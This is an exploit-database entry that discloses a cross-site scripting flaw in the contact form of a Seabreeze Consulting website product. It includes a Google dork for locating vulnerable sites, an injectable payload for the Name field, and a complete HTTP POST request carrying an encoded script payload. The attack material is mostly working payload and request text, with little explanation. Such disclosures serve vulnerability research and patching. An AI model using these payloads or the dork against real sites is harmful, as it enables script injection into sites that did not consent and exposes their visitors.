Share 
## https://sploitus.com/exploit?id=PACKETSTORM:157109
# Exploit Title: Seabreezeconsulting v1 XSS vulnerability  
# Google Dork:"by Seabreeze Consulting" +inurl:/contact.php  
# Date: 2020-04-03  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: www.seabreezeconsulting.com  
# Version: 1  
# Tested on: 5.4.0-4parrot1-amd6  
  
---------------------------------------------------------  
  
PoC 1 :  
  
XSS Vulnerability  
  
Payload(s) :  
In the "Name"-box use payload:  
"><img src=x onerror=prompt(document.domain);>  
  
www.anysite.com/contact.php  
  
  
------------  
POST https://www.example.com/contact.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 286  
Referer: https://www.example.com/contact.php  
Host: www.example.com  
  
name=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&businessname=VVV&address=VVV&citytown=VVV&phone=VVV&email=VVV&services%5B0%5D=Web+Design&services%5B1%5D=Hosting&services%5B2%5D=Domain+Registration&currentdomain=VVV&desireddomain=VVV&comments=&accept=yes&code=VVV&contactbtn=Submit  
-----------